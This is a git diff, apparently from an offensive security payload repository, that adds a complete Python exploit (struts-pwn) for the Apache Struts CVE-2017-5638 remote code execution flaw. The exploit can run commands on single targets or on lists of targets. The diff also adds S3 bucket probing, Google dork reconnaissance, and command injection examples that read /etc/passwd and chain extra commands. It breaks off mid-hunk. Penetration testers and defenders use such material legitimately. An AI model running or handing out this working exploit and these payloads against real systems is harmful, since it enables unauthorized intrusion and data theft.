diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index d8c0280..36fcd21 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -17,7 +17,12 @@ aws s3 mv test.txt s3://hackerone.files SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt" ``` -Bucket Finder +Basic test +``` +aws s3 ls s3://targetbucket +``` + +### Bucket Finder A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files. ``` wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 @@ -42,3 +47,4 @@ List of the top Alexa 100,000 sites with permutations on the TLD and www. For ex ## Thanks to * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets * https://digi.ninja/projects/bucket_finder.php +* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792) diff --git a/CVE Shellshock Heartbleed Struts2/Apache Struts2.py b/CVE Shellshock Heartbleed Struts2/Apache Struts2.py new file mode 100644 index 0000000..df93d83 --- /dev/null +++ b/CVE Shellshock Heartbleed Struts2/Apache Struts2.py @@ -0,0 +1,176 @@ +#!/usr/bin/env python3 +# coding=utf-8 +# ***************************************************** +# struts-pwn: Apache Struts CVE-2017-5638 Exploit +# Author: +# Mazin Ahmed +# This code is based on: +# https://www.exploit-db.com/exploits/41570/ +# https://www.seebug.org/vuldb/ssvid-92746 +# ***************************************************** +import sys +import random +import requests +import argparse + +# Disable SSL warnings +try: + import requests.packages.urllib3 + requests.packages.urllib3.disable_warnings() +except: + pass + +if len(sys.argv) <= 1: + print('[*] CVE: 2017-5638 - Apache Struts2 S2-045') + print('[*] Struts-PWN - @mazen160') + print('\n%s -h for help.' % (sys.argv[0])) + exit(0) + +parser = argparse.ArgumentParser() +parser.add_argument("-u", "--url", + dest="url", + help="Check a single URL.", + action='store') +parser.add_argument("-l", "--list", + dest="usedlist", + help="Check a list of URLs.", + action='store') +parser.add_argument("-c", "--cmd", + dest="cmd", + help="Command to execute. (Default: id)", + action='store', + default='id') +parser.add_argument("--check", + dest="do_check", + help="Check if a target is vulnerable.", + action='store_true') +args = parser.parse_args() +url = args.url if args.url else None +usedlist = args.usedlist if args.usedlist else None +url = args.url if args.url else None +cmd = args.cmd if args.cmd else None +do_check = args.do_check if args.do_check else None + + +def url_prepare(url): + url = url.replace('#', '%23') + url = url.replace(' ', '%20') + if ('://' not in url): + url = str('http') + str('://') + str(url) + return(url) + + +def exploit(url, cmd): + url = url_prepare(url) + print('\n[*] URL: %s' % (url)) + print('[*] CMD: %s' % (cmd)) + + payload = "%{(#_='multipart/form-data')." + payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + payload += "(#_memberAccess?" + payload += "(#_memberAccess=#dm):" + payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + payload += "(#ognlUtil.getExcludedPackageNames().clear())." + payload += "(#ognlUtil.getExcludedClasses().clear())." + payload += "(#context.setMemberAccess(#dm))))." + payload += "(#cmd='%s')." % cmd + payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." + payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + payload += "(#p=new java.lang.ProcessBuilder(#cmds))." + payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." + payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + payload += "(#ros.flush())}" + + headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Content-Type': str(payload), + 'Accept': '*/*' + } + + timeout = 3 + try: + output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + output = 'ERROR' + return(output) + + +def check(url): + url = url_prepare(url) + print('\n[*] URL: %s' % (url)) + + random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7)) + + payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']." + payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string) + headers = { + 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)', + # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', + 'Content-Type': str(payload), + 'Accept': '*/*' + } + + timeout = 3 + try: + resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) + if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)): + result = True + else: + result = False + except Exception as e: + print("EXCEPTION::::--> " + str(e)) + result = False + return(result) + + +def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check): + if url: + if do_check: + result = check(url) # Only check for existence of Vulnerablity + output = '[*] Status: ' + if result is True: + output += 'Vulnerable!' + else: + output += 'Not Affected.' + else: + output = exploit(url, cmd) # Exploit + print(output) + + if usedlist: + URLs_List = [] + try: + f_file = open(str(usedlist), 'r') + URLs_List = f_file.read().replace('\r', '').split('\n') + try: + URLs_List.remove('') + except ValueError: + pass + f_file.close() + except: + print('Error: There was an error in reading list file.') + exit(1) + for url in URLs_List: + if do_check: + result = check(url) # Only check for existence of Vulnerablity + output = '[*] Status: ' + if result is True: + output += 'Vulnerable!' + else: + output += 'Not Affected.' + else: + output = exploit(url, cmd) # Exploit + print(output) + + print('[%] Done.') + +if __name__ == '__main__': + try: + main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check) + except KeyboardInterrupt: + print('\nKeyboardInterrupt Detected.') + print('Exiting...') + exit(0) diff --git a/CVE Shellshock Heartbleed/Heartbleed.py b/CVE Shellshock Heartbleed Struts2/Heartbleed.py similarity index 100% rename from CVE Shellshock Heartbleed/Heartbleed.py rename to CVE Shellshock Heartbleed Struts2/Heartbleed.py diff --git a/CVE Shellshock Heartbleed/README.md b/CVE Shellshock Heartbleed Struts2/README.md similarity index 64% rename from CVE Shellshock Heartbleed/README.md rename to CVE Shellshock Heartbleed Struts2/README.md index f90ee34..5353a98 100644 --- a/CVE Shellshock Heartbleed/README.md +++ b/CVE Shellshock Heartbleed Struts2/README.md @@ -1,13 +1,16 @@ # Common Vulnerabilities and Exposures -Big CVEs in the last 5 years. +Big CVEs in the last 5 years. -## Heartbleed +## CVE-2014-0160 - Heartbleed The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). -## Shellshock +## CVE-2014-6271 - Shellshock Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system. +## CVE-2017-5638 - Apache Struts 2 +On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header. ## Thanks to * http://heartbleed.com * https://en.wikipedia.org/wiki/Shellshock_(software_bug) +* [Imperva Apache Struts analysis](https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/) diff --git a/CVE Shellshock Heartbleed/Shellshock.py b/CVE Shellshock Heartbleed Struts2/Shellshock.py similarity index 100% rename from CVE Shellshock Heartbleed/Shellshock.py rename to CVE Shellshock Heartbleed Struts2/Shellshock.py diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index 760a9cb..9d553c8 100644 --- a/Methodology_and_enumeration.md +++ b/Methodology_and_enumeration.md @@ -15,13 +15,16 @@ git clone https://github.com/danielmiessler/SecLists.git knockpy domain.com -w subdomains-top1mil-110000.txt ``` -* Using Google Dorks +* Using Google Dorks and Google Transparency Report ```bash site:*.domain.com -www site:http://domain.com filetype:pdf site:http://domain.com inurl:& site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf + +You need to include subdomains ;) +https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true ``` * Subdomain take over using HostileSubBruteForcer diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 958bc56..ff25192 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -1,14 +1,14 @@ # Remote Code Execution Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server. - + ## Exploits Normal code execution, execute the command and voila :p ``` -cat /etc/passwd -root:x:0:0:root:/root:/bin/bash -daemon:x:1:1:daemon:/usr/sbin:/bin/sh -bin:x:2:2:bin:/bin:/bin/sh +cat /etc/passwd +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ``` @@ -19,7 +19,7 @@ original_cmd_by_server && ls original_cmd_by_server | ls ``` -Code execution without space +Code execution without space - Linux ``` swissky@crashlab▸ ~ ▸ $ {cat,/etc/passwd} root:x:0:0:root:/root:/bin/bash @@ -40,6 +40,12 @@ Linux crashlab 4.4.X-XX-generic #72-Ubuntu swissky@crashlab▸ ~ ▸ $ sh